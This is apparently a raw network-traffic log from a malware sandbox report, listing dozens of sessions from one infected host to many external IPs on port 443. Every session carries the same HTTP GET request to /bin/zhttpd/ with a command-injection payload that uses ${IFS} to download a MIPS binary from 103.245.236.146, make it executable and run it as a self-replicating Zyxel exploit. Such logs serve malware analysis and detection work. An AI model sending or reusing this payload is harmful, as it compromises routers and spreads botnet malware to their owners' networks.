                                                        Jan 28, 2024 10:13:10.755569935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9105192.168.2.145161473.94.87.112443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.755589962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9106192.168.2.1454066173.103.1.47443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.755628109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9107192.168.2.1451080153.123.123.252443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.755683899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9108192.168.2.1438378186.250.140.17443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.755727053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9109192.168.2.1432906122.253.102.174443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.755758047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9110192.168.2.1444472199.126.174.67443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.755795956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9111192.168.2.1454314164.45.213.181443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.755846977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9112192.168.2.143726473.179.191.79443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.765393019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9113192.168.2.14353964.75.243.159443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.763660908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9114192.168.2.1435752122.146.8.186443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.763700008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9115192.168.2.145159037.135.89.166443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.763717890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9116192.168.2.144927638.85.164.32443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.763784885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9117192.168.2.1460856124.113.14.134443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.763814926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9118192.168.2.1454132136.206.191.105443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.763863087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9119192.168.2.1436020103.175.59.76443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.763900995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9120192.168.2.1443486192.111.148.170443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.763943911 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9121192.168.2.144651646.207.216.250443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.763993025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9122192.168.2.145518049.251.160.126443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.764023066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9123192.168.2.1450008108.188.234.97443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.764066935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9124192.168.2.1444090196.126.166.160443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.764097929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9125192.168.2.1436564163.36.21.181443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.764144897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9126192.168.2.1437078113.45.159.3443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.764179945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9127192.168.2.1450286148.49.110.127443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.764220953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9128192.168.2.1459254174.255.65.217443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.764271021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9129192.168.2.1459332172.233.31.115443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.764296055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9130192.168.2.1434224165.140.194.244443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.764339924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9131192.168.2.1446734145.82.25.251443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.764370918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9132192.168.2.1453978185.227.125.150443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.764422894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9133192.168.2.1448112167.234.225.78443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.764451027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9134192.168.2.143361090.148.44.231443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.764508009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9135192.168.2.1432862112.233.14.144443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.764539003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9136192.168.2.143398854.179.131.125443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.764597893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9137192.168.2.1442724113.192.151.84443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.764632940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9138192.168.2.1437560206.35.125.228443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.764677048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9139192.168.2.1442204153.151.240.226443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.764733076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9140192.168.2.1446724105.25.31.82443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.764763117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9141192.168.2.1435692197.16.26.140443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.764808893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9142192.168.2.1460884191.234.220.110443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.764821053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9143192.168.2.143672887.148.113.77443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.764852047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9144192.168.2.1458452156.157.200.18443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.764883041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9145192.168.2.143557054.22.117.180443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.764906883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9146192.168.2.1460556165.64.29.157443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.764950991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9147192.168.2.144666078.110.135.225443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.764969110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9148192.168.2.145968265.191.193.137443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.765007019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9149192.168.2.1459408148.237.39.94443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.765052080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9150192.168.2.1440974168.44.49.255443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.765100002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9151192.168.2.1447392193.234.146.150443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.765125036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9152192.168.2.145720041.97.175.15443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.765175104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9153192.168.2.144246246.74.115.122443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.765233994 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9154192.168.2.143541840.247.127.133443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.765250921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9155192.168.2.1456470170.59.2.238443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.765300989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9156192.168.2.1453544120.46.186.180443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.765326977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9157192.168.2.1435424221.179.200.11443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.765366077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9158192.168.2.14402388.146.70.89443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.765423059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9159192.168.2.1434722171.198.74.153443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.765454054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9160192.168.2.143410023.36.138.151443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.765506029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9161192.168.2.1452344157.45.56.239443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.765547037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9162192.168.2.1432906178.73.171.102443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.765579939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9163192.168.2.145605073.65.78.29443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.765629053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9164192.168.2.1438880204.206.9.176443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.765660048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9165192.168.2.145134843.218.1.11443
                                                        TimestampBytes transferredDirectionData
